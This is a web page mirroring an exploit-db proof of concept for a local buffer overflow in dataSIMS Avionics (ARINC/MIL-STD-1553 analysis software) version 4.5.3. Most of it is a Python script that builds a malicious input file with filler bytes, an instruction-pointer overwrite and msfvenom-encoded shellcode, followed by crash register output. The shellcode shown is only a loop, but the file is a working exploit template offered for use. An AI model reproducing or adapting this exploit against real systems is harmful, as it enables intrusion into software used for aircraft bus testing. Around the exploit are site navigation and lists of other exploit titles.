首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC)
来源:https://www.exploit-db.com/ 作者:KağanÇapar 发布时间:2021-02-20  
# Exploit Title: dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC)
# Exploit Author:  Kağan Çapar
# Date: 2020-02-17
# Vendor Homepage: https://www.ddc-web.com/
# Software Link: https://www.ddc-web.com/en/connectivity/databus/milstd1553-1/software-1/bu-69414?partNumber=BU-69414
# Version: 4.5.3
# Tested On: Windows 10 Enterprise (x64)
# about Sofware: 
# dataSIMS, an all-in-one Avionics Bus Analysis & Simulation Software Tool, provides an easy-to-use graphical interface, simplifying any MIL-STD-1553 or ARINC 429 testing effort.
# about ARINC 664-1:
# ARINC 664 is a multipart specification that defines an Ethernet data network for aircraft installations. 
# Part 7 of ARINC 664 defines a deterministic network, also known as Avionics Full Duplex Switched Ethernet (or AFDX®).

#!/usr/bin/env python
# -*- coding: UTF-8 -*-

import struct
import binascii
import os
import sys

#EAX : 00000000
#EBX : 00000000
#ECX : 42424242
#EDX : 77B96330     ntdll.77B96330
#EBP : 000A1328
#ESP : 000A1308
#ESI : 00000000
#EDI : 00000000
#EIP : 42424242
#EFLAGS : 00010246

#LastError : 00000000 (ERROR_SUCCESS)
#LastStatus : C0000034 (STATUS_OBJECT_NAME_NOT_FOUND)
#Last chance expection on 42424242 (C0000005, EXPECTION_ACCESS_VIOLATION)!

file = open("milstd1553result.txt", "w")
junk = "\x41" * 600
align = "\x32" * 4 + "\x31" * 4
prop = "\x43" * 380
imp = "\x62\x7a\x68\x72\x74\x75\x72\x6c\x75\x32"
imp2 = "\x61\x72\x61\x63\x61\x67\x131\x7a"

#EIP Overwrite junk value
overwrite = "\x42" * 4

#Payload size: 29 bytes
#Final size of py file: 160 bytes

#msfvenom -p generic/tight_loop --platform windows_86 -f py -e x86/shikata_ga_nai

buf =  b""
buf += b"\xda\xc1\xd9\x74\x24\xf4\x58\xbb\x0b\x7e\x97\x62\x33"
buf += b"\xc9\xb1\x01\x31\x58\x19\x83\xe8\xfc\x03\x58\x15\xe9"
buf += b"\x8b\x7c\x9c"

win32 = junk + align + prop + imp + imp2 + overwrite + buf

print len(win32)
file.write(win32)
file.close()
            

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Internet Explorer 11
·Apache Flink JAR Upload Java C
·Erlang Cookie - Remote Code Ex
·HFS (HTTP File Server) 2.3.x -
·Microsoft SQL Server Reporting
·Unified Remote 3.9.0.2463 - Re
·CompleteFTP Professional 12.1.
·VMware vCenter 6.5 / 7.0 Remot
·vCloud Director 9.7.0.15498291
·ASUS Remote Link 1.1.2.13 - Re
·Microsoft Windows - 'SMBGhost'
·Remote Desktop Web Access - Au
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved